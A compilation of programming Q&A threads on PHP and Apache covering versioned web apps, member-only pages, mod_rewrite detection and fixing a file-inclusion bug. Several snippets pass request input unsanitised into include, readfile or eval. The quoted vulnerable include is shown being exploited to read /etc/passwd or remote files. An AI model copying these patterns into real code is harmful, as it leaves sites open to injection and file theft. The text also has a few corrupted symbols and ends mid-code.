what I'm trying to do is to handle multiple versions of the same web application, somewhat like Google does with some of their products where you get the "Try the new version" link.
The goal is to have both a "stable" and a "beta" version of the webapp, letting users try out the new features without forcing them (and their bugs) on everyone.
Now, a very simple way of doing this would be to put each version in its own subfolder, like www.mywebapp.com/v1 and www.mywebapp.com/v2.
However, I would like this to be transparent to the user and the webapp URL to stay the same (e.g.: www.mywebapp.com/).
Which version must be loaded is determined server-side after the user logs in (e.g.: active version for the given user is stored in the DB) and may be later changed when the user clicks on the "try the new version"/"go back to the old version" links.
On the server side I must make do with MySQL, PHP and Apache.
I have already managed to get this working by placing each version into its own subfolder, then storing version information in cookies (updated by the server at each login or page refresh) and using RewriteRule(s) to "proxy" requests from the base/versionless URL to the proper subfolder. If no cookie is set, a default folder is selected by a fallback RewriteRule.
This kludge works, but it feels extremely fragile and puts an additional burden on the Apache daemon, so here I am asking if anybody knows a better way of doing this.
Thanks!
.htaccess allows for rewrites based on the contents of cookies. Since Apache is AWESOME at redirects and PHP is adequate, I would handle it that way.
This example tests to see if there is a vers cookie. If there is, it adds 'vers=' + whatever was in the vers cookie to the request.
RewriteEngine On
RewriteBase /
RewriteCond %{HTTP_COOKIE} vers=([^;]+) [NC]
RewriteRule ^(.*)$ /$1?vers=%1 [NC,L,QSA]
Use a single RewriteRule to reroute all requests to a single route.php file in the root folder of your website.
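A minimal sketch of that rule (assuming route.php sits in the web root as described):

RewriteEngine On
RewriteBase /
# Send everything except the router itself through route.php
RewriteCond %{REQUEST_URI} !^/route\.php
RewriteRule ^ route.php [L,QSA]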
The route.php file should look like this:
$user = authenticateUser();
$version = $user->getPreferredVersion();
$filePath = $_SERVER['DOCUMENT_ROOT'] . '/v' . $version . $_SERVER['REQUEST_URI'];

if ( !file_exists( $filePath ) ) {
    header( "Status: 404 Not Found", true, 404 );
    die();
}

$pathDetails = pathinfo( $filePath );
if ( $pathDetails['extension'] == 'php' ) {
    require( $filePath );
} else {
    if ( $pathDetails['extension'] == 'jpg' ) {
        header( 'Content-Type: image/jpeg' );
    } elseif ( $pathDetails['extension'] == 'gif' ) {
        header( 'Content-Type: image/gif' );
    } elseif ( $pathDetails['extension'] == 'css' ) {
        header( 'Content-Type: text/css' );
        // ... add further extensions the same way
    } else {
        // unsupported file type
        header( "Status: 404 Not Found", true, 404 );
        die();
    }
    echo file_get_contents( $filePath );
}
This is only an outline of what route.php should do; there are other security and technical issues that you should take care of in that file.
I think a better way in PHP would be to simply query the database, get the desired version, and then include() it from a subfolder. That way it's transparent to the user.
For instance, assuming the user has opted in for the new beta, you save his entry in the database,
UPDATE `versions_table` SET `version` = '1.02b' WHERE `userid` = 5
And then when he accesses the page, you have something like this going on:
//PDO Connection here, skipped for example purposes
$stmt = $pdo->query('SELECT `version` from `versions_table` WHERE `userid` = 5 LIMIT 1');
//Of course 5 is only an example, in actual code that would be a variable
//representing the actual user ID.
$row = $stmt->fetch(); //Should be only one row.
include_once($row['version'].'/myApp'.'.php'); //Include 1.02b/myApp.php
While it is possible to use a routing mechanism and session information to make rules, I would rather keep your current solution. All you'd do by implementing it in PHP is push the load from Apache (which already has a very fast rewrite engine) to the PHP binary. You would also put your application at risk of version interference caused by incompatible data, cookies and other session-based variables.
On the other hand, you'd have the benefit of reusing shared objects like libraries, domain models, data mappers, etc. But in my opinion that advantage doesn't outweigh the worse performance and the interference risk.
So, in one phrase: I believe your current solution is best.
Load your versioned pages in an IFRAME, with the IFRAME src set to something like "webapp.com/v2".
Whichever version the user selects, the address bar will still read webapp.com, but the IFRAME URL changes with the selected version.
There is no need to write rewrite rules.
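A minimal sketch, assuming $userVersion was loaded from the database when the user logged in:

<!-- index.php: the address bar stays on www.mywebapp.com -->
<iframe src="/v<?php echo htmlspecialchars($userVersion); ?>/"
        style="width:100%; height:100%; border:0;"></iframe>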
This might help; it is what I have been using for a month now:
Keep all the files in the database (path, code, version=DECIMAL(3,1), flag: stable=3 / lab=2 / beta=1 / alpha=0).
Have .htaccess redirect all non-existing files (don't redirect images, CSS, JS or other static, non-versioned files) internally to loader.pm (for you, loader.ph_); don't use the same extension as your other files, for differentiation:
RewriteCond %{REQUEST_FILENAME} !-f
RewriteRule ^ loader.pm [L,QSA]
The loader loads the latest stable version from the database, or the beta version if no stable version exists:
SELECT code, version, flag FROM table WHERE path = ? AND flag > 0 ORDER BY flag DESC, version DESC LIMIT 1
(Don't show alpha pages that are under development.)
Output a 404 error if there are no results, and
when a version is specified, like ?v=2.0, the loader uses a different query:
SELECT code, version, flag FROM table WHERE path = ? AND version <= ? ORDER BY flag DESC LIMIT 1
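Putting the pieces together, a rough sketch of the loader (assuming an existing PDO connection $pdo and a hypothetical files table with the columns described above):

// loader.ph_ -- a sketch only; adapt the table and column names
$path = parse_url($_SERVER['REQUEST_URI'], PHP_URL_PATH);

if (isset($_GET['v'])) {
    // A specific version was requested with ?v=
    $stmt = $pdo->prepare('SELECT code, version, flag FROM files
                           WHERE path = ? AND version <= ?
                           ORDER BY flag DESC LIMIT 1');
    $stmt->execute(array($path, $_GET['v']));
} else {
    // Latest stable, falling back to beta (alpha is excluded by flag > 0)
    $stmt = $pdo->prepare('SELECT code, version, flag FROM files
                           WHERE path = ? AND flag > 0
                           ORDER BY flag DESC, version DESC LIMIT 1');
    $stmt->execute(array($path));
}

$row = $stmt->fetch();
if (!$row) {
    header('HTTP/1.0 404 Not Found');
    exit;
}
eval('?>' . $row['code']); // the stored "code" column holds the page source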
Assumptions:
A user either wants stable or latest, so you actually don't need more than two files per path, unless you want to keep old versions for showcase. If the user wants latest, use .. ORDER BY version DESC, flag DESC, ..
The user doesn't care to know which version it is; hence, instead of setting the same version for the whole website at once, we set the version of each file individually, which makes tracking development easy.
Problems:
No index/primary key
You need to make sure that you don't have duplicate entries; it won't break your website, but it won't look good ;)
If the same beta and stable version exist for a file, and the user has opted for latest (beta), then you might accidentally deliver the beta file instead of the stable one.
The query-string variable ?v= is reserved for selecting versions, but that is fine; you may choose ?var= instead.
There is a cloud platform that does this automatically upon deployment. www.cycligent.com
It is just a matter of setting a cookie once the two versions are deployed. A lot less work than some of the other answers shown.
Full Disclosure: I work for Cycligent.
Related
I have a web site which currently has over 900 HTML articles viewable by anyone. I want to change it to restrict viewing of certain articles to members only. I have the articles in an SQL database with a flag marking the restricted ones. There is an article index with links to each article. The process will be: check if the article is restricted, check if the user is a member who is logged in, then display it; otherwise send them to the login or subscribe pages. Since there are so many articles, I can't just add some PHP to each one to prevent it being displayed when accessed directly. My question is: where in my web directory do I put these article pages, and how do you protect someone from directly accessing a page, while allowing access once the user is authenticated? Any input is appreciated. Anyone know of good reference books on this, either?
Move the files so that they're above your document root, and therefore inaccessible through the web server. Or move the files to a directory which you protect with a password (.htaccess/.htpasswd pair). You never give out that password; it's only there to prevent direct access of the files.
Then, write a script which proxies the articles. That script checks if the user is logged in. If not, it redirects them to the login page. If it is, it reads the article HTML from its actual location, and sends it through.
Ex: http://www.example.com/article.php?view=cooking.html
session_start();

if (!isset($_SESSION['logged_in'])) {
    header("Location: login.php");
    exit; // stop here; a Location header alone doesn't halt the script
} else {
    readfile("/path/to/articles/" . $_GET['view']);
}
You'll want to do some kind of sanitation on $_GET['view'] to make sure it doesn't contain anything but the name of an article.
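For example (a sketch assuming article files are named with letters, digits, dashes and underscores only):

$view = basename($_GET['view']); // strip any directory components
if (preg_match('/^[A-Za-z0-9_-]+\.html$/', $view)) {
    readfile("/path/to/articles/" . $view);
} else {
    die("Invalid article name.");
}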
You can even keep your current URLs and links to the articles by rewriting them to the proxy script in your .htaccess/httpd.conf with mod_rewrite. Something like this:
RewriteEngine On
RewriteRule ^article/(.*)\.html$ article.php?view=$1.html [L]
If you don't already have an existing PHP framework that would help with security matters, you might consider something even simpler than using PHP to restrict access. Read up on .htaccess files and how you can create a protected directory in which you could place all the restricted articles. Then you can set up user accounts and require people to authenticate themselves before they can read the restricted articles.
Here's a tutorial on how to setup .htaccess for user authorization/authentication:
http://www.javascriptkit.com/howto/htaccess3.shtml
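In outline, the protected directory's .htaccess would contain something like this (paths are illustrative):

AuthType Basic
AuthName "Restricted Articles"
AuthUserFile /home/yoursite/.htpasswd
Require valid-user

Users are then added to the password file with the htpasswd utility, e.g. htpasswd -c /home/yoursite/.htpasswd username (-c only when creating the file).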
You have a couple of basic options:
Add the code to each page. You can probably automate this, so it's not as bad as it sounds. It really shouldn't be more than a single include.
Figure out how to get your web server software (e.g., Apache) to do the authentication checks. Depending on how complicated your checks are, a mod_rewrite external mapping program may be able to do it (see the sketch after this list). Other than that, there are existing authentication modules, and writing a fairly simple shim isn't that hard (if you know C).
Feed all page loads through PHP. This will probably break existing URLs, unfortunately. You pass the page you want to see as a parameter or as part of the path (depending on server config), then do your checks inside your script, and finally send the page if the checks pass.
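For the second option, a mod_rewrite external mapping program could be wired up roughly like this (a sketch; the checker script is hypothetical, and RewriteMap must be declared in the server config, not in .htaccess):

RewriteEngine On
# The program reads one URI per line on stdin and prints "allow" or "deny".
RewriteMap access prg:/usr/local/bin/check_access.php
RewriteCond ${access:%{REQUEST_URI}} =deny
RewriteRule ^ /login.php [R,L]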
The simplest way would probably be to move all the article files outside the web root, and then use PHP to fetch them if the client is allowed to see them.
For example:
<?php
if (isset($_GET['id']))
{
    $articleDir = "/var/articles/";

    // Assuming a "?id=1" query string is used to pass a numeric ID of
    // an article. (Like: example.com/showArticle.php?id=1)
    $articleID = (int)$_GET['id'];
    $articleFile = "article_{$articleID}.html";

    // Look through your SQL database to see if the article is restricted.
    // I'll leave the coding of that up to you though.

    if (!$isRestricted || $isLoggedIn)
    {
        $path = $articleDir . $articleFile;
        if (file_exists($path))
        {
            include $path;
        }
        else
        {
            echo "The requested article does not exist.";
        }
    }
    else
    {
        echo "You have to be logged in to see this article.";
    }
}
else
{
    echo "No article ID was passed. Did you perhaps follow a bad link?";
}
?>
Note that if you want to keep the old links alive, you can use Apache's mod_rewrite to rewrite incoming requests and route them to your PHP file.
Edit
This may help if you are new to mod_rewrite and/or regular expressions:
<IfModule mod_rewrite.c>
RewriteEngine On
RewriteRule ^article_(\d+)\.html$ fetchArticle.php?id=$1 [L]
</IfModule>
Routes any link such as example.com/article_123.html to example.com/fetchArticle.php?id=123 without the client noticing it.
Similar to what Dan Grossman did, but this one fetches only numbers.
I want to create a link like the following:
http://www.myurl.com/?IDHERE
What I want to be able to do is go to the above link, pull what's after the ? (in this case IDHERE), and use that information to perform a MySQL lookup and return a page.
Can anyone point me in the right direction? Please note this is using PHP, not ASP.
The issue here is not with your scripting language, but with your web server setup. I'll refer to these by their Apache names, but the features should be available in most web servers.
There are three features you might want to use:
1) content negotiation (mod_negotiation), which allows your web server to try a specified list of extensions in a specified order, for example: http://example.com/foo might be http://www.example.com/foo.html or http://example.com/foo.php
2) DirectoryIndex, which tells the web server that when a client asks for http://example.com it should look for a specified list of files in order, so it might serve up http://example.com/index.html or http://example.com/index.php
3) mod_rewrite, which allows you to basically rewrite the URL format received by the server. This allows you to do things like translate http://example.com/foo/bar/baz to http://example.com/foo/bar.php?page=baz
The rest is done by the backend script code as normal.
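For illustration, the Apache side of those three features might look like this (a sketch; directives and paths will vary with your setup):

# 1) Content negotiation: a request for /foo can resolve to foo.html or foo.php
Options +MultiViews

# 2) DirectoryIndex: which files to try when a bare directory is requested
DirectoryIndex index.html index.php

# 3) mod_rewrite: translate /foo/bar/baz into /foo/bar.php?page=baz
RewriteEngine On
RewriteRule ^([^/]+)/([^/]+)/([^/]+)$ /$1/$2.php?page=$3 [L]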
Create a default PHP file in that directory that will get loaded when no file name is specified (e.g. index.php). In your PHP script you can get the part after the question mark from the variable $_SERVER['QUERY_STRING'].
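A sketch of that index.php, including the MySQL lookup the question asks about (the table, columns and credentials are made up):

<?php
// index.php -- handles links like http://www.myurl.com/?IDHERE
$id = $_SERVER['QUERY_STRING'];

// Accept only a simple alphanumeric ID.
if ($id === '' || !preg_match('/^[A-Za-z0-9]+$/', $id)) {
    die('No valid ID was given.');
}

$pdo = new PDO('mysql:host=localhost;dbname=mydb', 'user', 'pass');
$stmt = $pdo->prepare('SELECT title, body FROM pages WHERE id = ?');
$stmt->execute(array($id));
$page = $stmt->fetch();

if ($page) {
    echo '<h1>' . htmlspecialchars($page['title']) . '</h1>';
    echo $page['body'];
} else {
    echo 'Page not found.';
}
?>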
Do the following in your site's main index.php:
list($id) = array_keys($_GET);
// right now, $id represents the ID you're looking for.
// Do whatever you want with it.
In the link, form or whatever - index.php?id=someid
In your index.php file:
$id = $_GET['id'];
Now you can use it:
e.g.
echo $id;
Since it's your default page, it will work without the extension.
list($id) = array_keys($_GET);
// right now, $id represents the ID you're looking for.
// Do whatever you want with it.
This was exactly what I was looking for, though now I just need to create something that tells the user when nothing is there. Thank you all for your responses.
I would solve it by using a .htaccess file, if possible.
Create a .htaccess file in the main directory with the content:
RewriteEngine on
RewriteRule ^(.*)/(.*)/(.*)$ /$1/$2.php?page=$3
That should translate "example.com/foo/bar/baz" to "example.com/foo/bar.php?page=baz".
What I want to ask is whether there is a way to find out if a web-server instance has URL rewriting enabled. I need this in order to be able to instantiate the correct type of URL handler.
Theoretically you know in advance if you have it enabled or not and can use something to configure it. I would like, however, to be able to detect this setting automatically at runtime.
The URL rewrite rule would be something very simple like:
^/(.*)$ => /bootstrap.php
This guarantees that the relevant string is present in the REQUEST_URI, but doesn't pollute the _GET array.
Where my research has taken me so far:
Apache.
In my opinion Apache has a very quirky approach, since it sets the REDIRECT_SCRIPT_URI header for rewritten URLs, but not for ones that are not rewritten.
E.g. http://host/ana/are/mere would be rewritten to index.php, so the aforementioned header would be present, but http://host/ wouldn't be rewritten.
Lighttpd.
Lighttpd with fast-cgi behaves OK, setting the REDIRECT_URI header if URL Rewrite is enabled for the current host. This is reliable.
Cherokee.
Well, for Cherokee I have found no method, as it uses (in my opinion) a more complicated mechanism for URL rewriting. (It's called an internal redirect, and the fcgi process doesn't know that the request was redirected.)
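For what it's worth, a detection sketch based on the observations above (header availability varies per server and configuration, so treat this as a heuristic, not a guarantee):

function rewriteSeemsEnabled()
{
    // Lighttpd (fastcgi) sets REDIRECT_URI when the request was rewritten.
    if (isset($_SERVER['REDIRECT_URI'])) {
        return true;
    }
    // Apache sets REDIRECT_SCRIPT_URI, but only for rewritten requests,
    // so this must run on a request that actually went through a rewrite.
    return isset($_SERVER['REDIRECT_SCRIPT_URI']);
}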
Also, I haven't tested other HTTP servers, such as nginx, so if someone has some input on this matter I would love to hear it.
Not the most elegant solution, but you could create a directory, insert a .htaccess and a small php file and try to open it with curl/file_get_contents() from your actual code:
.htaccess
RewriteEngine on
RewriteRule ^(.*?)$ index.php?myparam=$1
index.php
<?php
//open with file_get_contents("http://yoursite/directory/test")
if(isset($_GET['myparam'])){die("active");}
?>
Although this might be acceptable during an installation, for performance reasons this shouldn't be used for every request on your site! Save the information somewhere (sqlite/textfile).
Update
Apache specific, but apache_get_modules()/phpinfo() in combination with array_search/strpos is maybe helpful to you.
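For instance, the phpinfo() variant might be sketched like this:

<?php
// Capture phpinfo()'s module listing and search it for mod_rewrite.
// Apache-specific, and only tells you the module is loaded, not usable.
ob_start();
phpinfo(INFO_MODULES);
$info = ob_get_clean();
echo (strpos($info, 'mod_rewrite') !== false)
    ? 'mod_rewrite reported'
    : 'mod_rewrite not reported';
?>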
It's already touched upon below, but I believe the following recipe is a rather watertight solution to this problem:
Set up the redirection
Request a page through its rewritten URL
If the request returns the page in question, you have redirection set up correctly; if you get an HTTP 404 response, then it's not working.
The idea is basically that this works with just about any redirection method. It has already been mentioned, but bears reiterating: such tricks add quite a bit of overhead and are better performed only once (at installation or from the settings panel) and then saved in the settings.
Some implementation details, choices to make and a little on how I came to this solution:
I remembered Drupal did such a check during the installing process, so I looked up how they did it. They had the javascript on the install page do an ajax request (synchronously, to prevent concurrency issues with the database). This requires the user installing the software to have javascript turned on, but I don't think that's an unreasonable requirement.
However, I do think using PHP to request the page might be a cleaner solution. Alongside not bothering with a JavaScript requirement, it needs less data to be sent back and forth and doesn't require the logic of the action to be spread over multiple files. I don't know if there are other (dis)advantages to either method, but this should get you going and let you explore the alternative choices yourself.
There is another choice to be made: whether to test in a test environment or on the normal site. What Drupal does is just have the redirection always turned on (in the Apache case, the .htaccess file that does the redirects is simply part of the Drupal download) but only write the fancy URLs if the redirection is turned on in the settings. This has the disadvantage that it takes more work to detect which type of redirection is used, but it's still possible (you can, for example, add a GET variable showing the redirection engine either on a specific test page or even on every page, or you can redirect to a page that sets $redirectionEngine and then includes the real index). Though I don't have much experience with redirection other than with mod_rewrite on Apache, I believe this should work with just about every redirection engine.
The other option here is to use a test environment. Basically the idea is to either create a folder and set up redirection for it, or to remove the need for file-system write access and instead ship a test folder (or one folder per redirection engine). This has some disadvantages: you still need write access to set up the redirection for the main site (though maybe not for all redirection engines; for Apache you will need write access if you are going to turn on redirection), it might be easier for a bot to detect what software and what version of it you are using by accessing the tests (unless you remove the test folders after testing), and you need to be able to rewrite only part of the site (which it makes sense for any redirection engine to support, but I'm not blindly going to assume this functionality). However, this does come with the advantage that it is easier to find out which rewrite engine is being used, or basically any other aspect of the redirection. There might also be other advantages I don't know of, so I just give the options and let you pick your method yourself.
With some options left to the user, I believe this should help you set up the system in the manner that you like.
PHP has server-specific functions for Apache, IIS and NSAPI servers. I only have Apache but as merkuro suggested this works as expected:
<?php
if (in_array('mod_rewrite', @apache_get_modules()))
    echo 'mod_rewrite enabled';
else
    echo 'mod_rewrite not enabled';
?>
As PHP's server-specific functions don't cover all the servers you'd like to test in, this probably isn't the best solution.
I'd recommend merkuro's first answer - implementing then testing it in script. I believe it's the only way to get a good result.
Hope that helps!
You can programmatically check for the existence of mod_rewrite if the server is Apache by using the apache_get_modules() function in PHP:
$modules = apache_get_modules();
echo in_array('mod_rewrite', $modules) ? 'mod_rewrite detected' : 'mod_rewrite not detected';
This could be used as a first step, but it is not a foolproof method by any means. Just because mod_rewrite is loaded does not mean it is available for your environment. This also doesn't help if you are on a server that is not Apache.
There are not many consistent methods that will work across all platform combinations. But since the result is consistent, you can test for that. Set up a special redirect, and have a script use PHP's cURL or file_get_contents() to check a test URL. If the redirect was successful, you will get the expected content, and you can test easily for this.
This is a basic .htaccess I set up to redirect ajax to ajax.php:
RewriteEngine On
RewriteRule ajax ajax.php [L]
The following PHP script will attempt to get the contents of ajax. The real script name is ajax.php. If the redirect fails, then it will not get the expected contents.
error_reporting(E_ALL | E_STRICT);
$url = 'http://'.$_SERVER['HTTP_HOST'].dirname($_SERVER['REQUEST_URI']).'/ajax';
$result = json_decode(#file_get_contents($url));
echo ($result === "foobar") ? 'mod_rewrite test was successful' : 'mod_rewrite test failed';
Lastly, here is the final piece of the script, ajax.php. This returns the expected response when the redirect is successful:
echo json_encode('foobar');
I have set up a live example of this test, and I have also made the full sources available.
As all the answers already mention, actually testing it is the only way to be sure it works. But instead of redirecting to an actual page and waiting for it to load, I would just check the headers.
In my opinion this is quick enough to be used at runtime even on a regular site. If it really needs to be high-performance, then of course caching the result is better.
Just put something like the following in your .htaccess file
RewriteEngine on
RewriteRule ^/redir/My/Super/Special/Hidden/Url/To/Test/$ /redir/longload.php [L,R=307]
And then you can use the following PHP code to check whether mod_rewrite is enabled.
<?php
function HasModRewrite() {
    $s = (!empty($_SERVER["HTTPS"]) && $_SERVER["HTTPS"] == "on") ? "s" : "";
    $sp = strtolower($_SERVER["SERVER_PROTOCOL"]);
    $protocol = substr($sp, 0, strpos($sp, "/")) . $s;
    $port = ($_SERVER["SERVER_PORT"] == "80") ? "" : (":" . $_SERVER["SERVER_PORT"]);
    $options['http'] = array(
        'method'          => "HEAD",
        'follow_location' => 0,
        'ignore_errors'   => 1,
        'timeout'         => 0.2
    );
    $context = stream_context_create($options);
    $body = file_get_contents($protocol . "://" . $_SERVER['SERVER_NAME'] . $port . '/redir/My/Super/Special/Hidden/Url/To/Test/', NULL, $context);
    if (!empty($http_response_header)) {
        return substr_count($http_response_header[0], ' 307') > 0;
    }
    return false;
}

$st = microtime(true);
$x = HasModRewrite();
$t = microtime(true) - $st;
echo 'Loaded in: ' . $t . '<hr>';
var_dump($x);
?>
output:
Loaded in: 0.002657
---------------------
bool(true)
Hi, I am trying to redirect all links to any PDF file on my site to a page with a form on it that collects user info before they can proceed to download/view the PDF.
E.g.
I want to redirect *.pdf files on the web site to request.php?file=name_of_pdf_being_redirected
Where request.php is the page with the form on it asking for a few details before proceeding.
All PDFs on the site are held inside the /pdf folder.
Any ideas?
EDIT: sorry I'm using Apache on the server.
OK I'M GETTING THERE:
I have it working now using:
RewriteEngine on
RewriteRule ^pdf/(.+\.pdf)$ request.php?file=/$1 [R]
But now, when the user gets to the download page and I want to let them actually download the file, my new rule spits the download link back to the form :-P haha. So is there any way to let it download the file once the form has been submitted and you're on download.php?
Ideas? You could start by telling us which web/app server you're using, that might help :-)
In Apache, you should be able to use a RewriteRule to morph the request into a different form. For example, turning /pub/docs/x.pdf into request.php?file=/pub/docs/x.pdf could be done with something like:
RewriteRule ^/pdf/(.*)\.pdf/ request.php?file=/$1.pdf
Keep in mind this is from memory (six years since I touched Apache and still clean :-); the format may be slightly different.
Update:
Now you've got that sorted, here's a couple of options for your next problem.
1/ Rename the PDFs to have a different extension so that they're not caught by the rewrite rule. They should be configured to push out the same MIME type to the client so that they open in the client's choice of viewer.
2/ Do the download as part of the script as well, not as a direct access to the PDF. Since the submission of the form is a HTTP request, you should be able to answer it immediately with the PDF contents rather than re-directing them again to the download page.
That second option would be my choice since it:
stops people figuring out they can get to the PDFs just by requesting xx.pdfx instead of xx.pdf.
makes it quicker for the person to get the PDF (they don't have to click on the link again).
You can try this:
Move your files to a folder "outside" your web root so that no one can access it thru a browser
Use sessions to detect whether a person has completed the form or not
Use a php powered file download script. In its naivest form, it might look like this:
session_start();

if ( !isset( $_SESSION['OK_TO_DOWNLOAD'] ) )
{
    header( "Location: must_fill_this_first.php" );
    exit( 0 );
}

header( "Content-type: application/pdf" );
// basename() blocks "../" path traversal; echo/file_get_contents is binary-safe
echo file_get_contents( 'some_directory_inaccessible_thru_www/' . basename( $_GET['pdf_name'] ) );
This is a tried and tested technique I used on a website. The code example is a draft outline and needs refinement.
Note, my answer is with respect to a .NET website, but I'm sure the same constructs exist somewhere in PHP.
I would have an HTTPModule with a path of *.pdf that simply does a Response.Redirect to request.php?...etc. (in my case request.aspx). Then, in the event handler for the button click on that page, when you know which PDF to display and that the user is authorized, simply do Response.ContentType = [MIME type of pdf], then Response.WriteFile(pdfFile), and finally Response.End().
There are other things you can add to make it better, such as the file size, etc. But in the minimal case, this would work. If you want the code for it in C# I could come up with something in about 3 minutes, but in PHP I'm quite lost. I'd start out looking for HTTPModules and how to write them in PHP.
Googling for "PHP HTTPModule" leads to this: Equivalent of ASP.NET HttpModules in PHP. So I may be a little wrong, but hopefully that's a starting point.
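In PHP, the analogue of that module/handler pair might be sketched like this (file names and the session flag are made up; header(), readfile() and exit play the roles of the Response calls above):

<?php
// download.php -- runs after the form on request.php has been submitted
session_start();
if (empty($_SESSION['form_completed'])) {
    header('Location: request.php');               // Response.Redirect
    exit;                                          // Response.End
}
$pdfFile = '/path/outside/webroot/' . basename($_GET['file']);
if (!is_file($pdfFile)) {
    header('HTTP/1.0 404 Not Found');
    exit;
}
header('Content-Type: application/pdf');           // Response.ContentType
header('Content-Length: ' . filesize($pdfFile));   // the file-size extra
readfile($pdfFile);                                // Response.WriteFile
exit;                                              // Response.End
?>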
Use an .htaccess file if you're using an Apache web server. You'll need to make certain that you have mod_rewrite enabled, but once you do you can rewrite all files using these two simple lines:
RewriteEngine On
RewriteRule ^(.*)\.pdf$ /rewrite.php [NC,L]
If you are using IIS, you can accomplish something similar using ISAPI_Rewrite.
Your other alternative is to place your PDFs inside a directory that is not publicly accessible; then any direct request for a PDF resource would return an access denied error, and the files could only be accessed through the appropriate download script.
if ($userIsAuthenticated) { // substitute your own auth check
    // set PDF headers
    header('Content-Type: application/pdf');
    echo file_get_contents('actual.pdf');
}
No mod_rewrites; it hides the actual source, and it's what I normally do. Hope this helps!
My website was recently attacked by what seemed to me to be innocent code:
<?php
if ( isset( $_GET['page'] ) ) {
    include( $_GET['page'] . ".php" );
} else {
    include( "home.php" );
}
?>
There were no SQL calls, so I wasn't afraid of SQL injection. But, apparently, SQL isn't the only kind of injection.
This website has an explanation and a few examples of avoiding code injection: http://www.theserverpages.com/articles/webmasters/php/security/Code_Injection_Vulnerabilities_Explained.html
How would you protect this code from code injection?
Use a whitelist and make sure the page is in the whitelist:
$whitelist = array('home', 'page');

if (in_array($_GET['page'], $whitelist)) {
    include($_GET['page'] . '.php');
} else {
    include('home.php');
}
Another way to sanitize the input is to make sure that only allowed characters (no "/", ".", ":", ...) are in it. However, don't use a blacklist of bad characters, but a whitelist of allowed characters:
$page = preg_replace('/[^a-zA-Z0-9]/', '', $page);
... followed by a file_exists.
That way you can make sure that only scripts you want to be executed are executed (for example this would rule out a "blabla.inc.php", because "." is not allowed).
Note: This is kind of a "hack", because then the user could request "h.o.m.e" and still get the "home" page, since all it does is remove the prohibited characters. It's not intended to stop "smartasses" who want to do cute stuff with your page, but it will stop people doing really bad things.
BTW: Another thing you could do in your .htaccess file is to prevent obvious attack attempts:
RewriteEngine on
RewriteCond %{QUERY_STRING} http[:%] [NC]
RewriteRule .* /-http- [F,NC]
RewriteRule http: /-http- [F,NC]
That way all page accesses with "http:" url (and query string) result in an "Forbidden" error message, not even reaching the php script. That results in less server load.
However, keep in mind that no "http" is then allowed in the query string. Your website MIGHT require it in some cases (maybe when filling out a form).
BTW: If you can read German, I also have a blog post on that topic.
The #1 rule when accepting user input is: always sanitize it. Here, you're not sanitizing your page GET variable before passing it to include(). You should perform a basic check to see whether the file exists on your server before you include it.
Pek, there are many things to worry about in addition to SQL injection, and even different types of code injection. Now might be a good time to look a little further into web application security in general.
From a previous question on moving from desktop to web development, I wrote:
The OWASP Guide to Building Secure Web Applications and Web Services should be compulsory reading for any web developer that wishes to take security seriously (which should be all web developers). There are many principles to follow that help with the mindset required when thinking about security.
If reading a big fat document is not for you, then have a look at the video of the seminar Mike Andrews gave at Google a couple years back about How To Break Web Software.
I'm assuming you deal with files in the same directory:
<?php
if (isset($_GET['page']) && !empty($_GET['page'])) {
    $page = urldecode($_GET['page']);
    $page = basename($page);
    $file = dirname(__FILE__) . "/{$page}.php";

    if (!file_exists($file)) {
        $file = dirname(__FILE__) . '/home.php';
    }
} else {
    $file = dirname(__FILE__) . '/home.php';
}

include $file;
?>
This is not too pretty, but should fix your issue.
pek, for a short-term fix, apply one of the solutions suggested by other users. For a mid- to long-term plan you should consider migrating to one of the existing web frameworks. They handle all the low-level stuff like routing and file inclusion in a reliable, secure way, so you can focus on core functionality.
Do not reinvent the wheel. Use a framework. Any of them is better than none. The initial time investment in learning it pays back almost instantly.
Some good answers so far; it's also worth pointing out a couple of PHP specifics:
The file-open functions use wrappers to support different protocols. This includes the ability to open files over a local Windows network, HTTP and FTP, amongst others. Thus, in a default configuration, the code in the original question can easily be used to open any arbitrary file on the internet and beyond, including, of course, all files on the server's local disks (that the webserver user may read). /etc/passwd is always a fun one.
Safe mode and open_basedir can be used to prevent files outside a specific directory from being accessed.
Also useful is the config setting allow_url_fopen, which can disable URL access to files when using the file-open functions. ini_set can be used to set and unset this value at runtime.
These are all nice fall-back safety guards, but please use a whitelist for file inclusion.
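As a sketch, the corresponding php.ini lines might be (use them alongside a whitelist, not instead of one):

; fall-back safety guards
allow_url_fopen = Off      ; no remote files via fopen()/file_get_contents()
allow_url_include = Off    ; no remote files via include/require (PHP 5.2+)
open_basedir = /var/www/mysite   ; restrict file access to this tree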
I know this is a very old post and I expect you don't need an answer anymore, but I still miss a very important aspect, imho, and I'd like to share it for other people reading this post. In your code, including a file based on the value of a variable makes a direct link between the value of a field and the requested result (page becomes page.php). I think it is better to avoid that.
There is a difference between the request for some page and the delivery of that page. If you make this distinction you can make use of nice URLs, which are very user- and SEO-friendly. Instead of a field value like 'page' you could make a URL like 'Spinoza-Ethica'. That is a key in a whitelist or a primary key in a table in a database, and it will return a hardcoded filename or value. That method has several advantages besides a normal whitelist (a short sketch follows the list):
The back-end response is effectively independent from the front-end request. If you want to set up your back-end system differently, you do not have to change anything on the front end.
Always make sure you end up with hardcoded filenames or an equivalent from the database (preferably a return value from a stored procedure), because it is asking for trouble when you use information from the request to build the response.
Because your URLs are independent of the delivery from the back end, you will never have to rewrite your URLs in the .htaccess file for this kind of change.
The URLs presented to the user are user-friendly, informing the user about the content of the document.
Nice URLs are very good for SEO, because search engines are in search of relevant content, and when your URL is in line with the content it will get a better rating. At least a better rating than when your content is definitely not in line with your URL.
If you do not link directly to a PHP file, you can translate the nice URL into any other type of request before processing it. That gives the programmer much more flexibility.
You will have to sanitize the request, because you get the information from a standard untrustworthy source (the rest of the Web). Using only nice URLs as possible input makes the sanitization process much simpler, because you can check whether the returned URL conforms to your own format. Make sure the format of the nice URL does not contain characters that are used extensively in exploits (like ', ", <, >, -, &, ; etc.).
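A minimal sketch of this request/delivery split (the slugs, filenames and map are invented for illustration):

<?php
$slug = isset($_GET['page']) ? $_GET['page'] : 'home';

// Accept only our own nice-URL format: letters, digits and dashes.
if (!preg_match('/^[A-Za-z0-9-]+$/', $slug)) {
    $slug = 'home';
}

// The slug is only a key; the filename it maps to is hardcoded.
$map = array(
    'home'           => 'home.php',
    'Spinoza-Ethica' => 'articles/spinoza_ethica.php',
);

$file = isset($map[$slug]) ? $map[$slug] : $map['home'];
include dirname(__FILE__) . '/' . $file;
?>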
#pek - That won't work, as your array keys are 0 and 1, not 'home' and 'page'.
This code should do the trick, I believe:
<?php
$whitelist = array(
    'home',
    'page',
);

if (in_array($_GET['page'], $whitelist)) {
